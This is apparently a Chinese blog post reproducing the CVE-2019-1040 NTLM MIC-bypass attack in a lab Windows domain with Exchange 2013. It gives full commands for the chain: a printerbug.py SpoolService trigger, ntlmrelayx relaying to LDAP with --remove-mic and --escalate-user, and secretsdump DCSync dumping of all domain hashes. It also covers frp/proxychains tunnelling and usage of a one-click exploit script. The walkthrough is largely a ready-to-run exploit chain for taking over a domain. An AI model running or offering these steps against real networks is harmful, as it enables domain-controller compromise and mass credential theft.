CVE-2019-1040内网大杀器利用前言前两天闲来无事重新在虚拟机搭建了一个域环境，装上了EXCHANGE2013版本，于是想着顺便复现一下大杀器
背景描述：此漏洞在exchange_RCE未出现前是域内大杀器，此漏洞可运用于已有域账户但是exchange已修补rce漏洞情况下展开攻击
2019年6月12日，微软官方在6月的补丁日中发布了漏洞 CVE-2019-1040的安全补丁，攻击者可以利用该漏洞绕过NTLM MIC（消息完整性检查）
攻击者可以修改NTLM身份验证流程中的签名要求，完全删除签名验证，并尝试中继到目标服务器，不强制执行签名的服务器都易受到攻击
通过这种攻击能使攻击者在仅有一个普通域账号的情况下可远程控制 Windows 域内的任何机器，包括域控服务器
漏洞利用条件1.已有域成员账号密码，存在一台exchange服务2.已有域成员账号密码，目标域内存在两个域
3.这里仅演示exchange漏洞细节用任何AD帐户，通过SMB连接到目标Exchange服务器，并触发SpoolService错误
目标服务器将通过SMB回连至攻击者主机，使用ntlmrelayx将SMB身份验证中继到LDAP
使用中继的LDAP身份验证，为攻击者帐户授予DCSync权限
攻击者帐户使用DCSync转储AD中的所有密码哈希值
环境搭建DC（exchange）192.168.1.104Windows7 域内机器 192.168.1.102Atttcker:Mac 192.168.1.100漏洞利用过程漏洞利用VPS搭建frp代理服务端Win7搭建代理隧道Atttcker proxychains4ntlmrelayx.py进行中继攻击

执行ntlmrelayx.py脚本进行NTLM中继攻击，设置SMB服务器并将认证凭据中继到LDAP协议
其中–remove-mic选项用于清除MIC标志，–escalate-user用于提升指定用户权限proxychains4 python ntlmrelayx.py --escalate-user WIN7User -t ldap://AD.syst1m.local -smb2support --remove-mic --delegate-accessWin7搭建代理隧道Atttcker frpc配置Proxifier添加隧道，代理frpcAtttcker 启动 frpcprinterbug.py脚本

触发SpoolService的bugpython printerbug.py 域/用户名:密码@打印机服务ip 回连ipproxychains4 python printerbug.py syst1m.local/WIN7User:win7user521.@192.168.1.104 192.168.1.102SpoolService的bug导致Exchange服务器回连到ntlmrelayx.py，即将认证信息发送到ntlmrelayx.pyntlmrelayx.py结果secretsdump.py去dcsyncsecretsdumpproxychains4 secretsdump.py syst1m.local/WIN7User@syst1m.local -just-dcCVE-2019-1040一键化脚本来自evi1cg师傅写的利用工具https://github.com/Ridter/CVE-2019-1040使用方式python CVE-2019-1040.py -ah 192.168.1.100 -u 'WIN7User' -p 'win7user521.' -d 'syst1m.local' -th 192.168.1.103 192.168.1.104漏洞利用参考https://github.com/Ridter/CVE-2019-1040https://dirkjanm.io/exploiting-CVE-2019-1040-relay-vulnerabilities-for-rce-and-domain-admin/

（图片来源网络，侵删）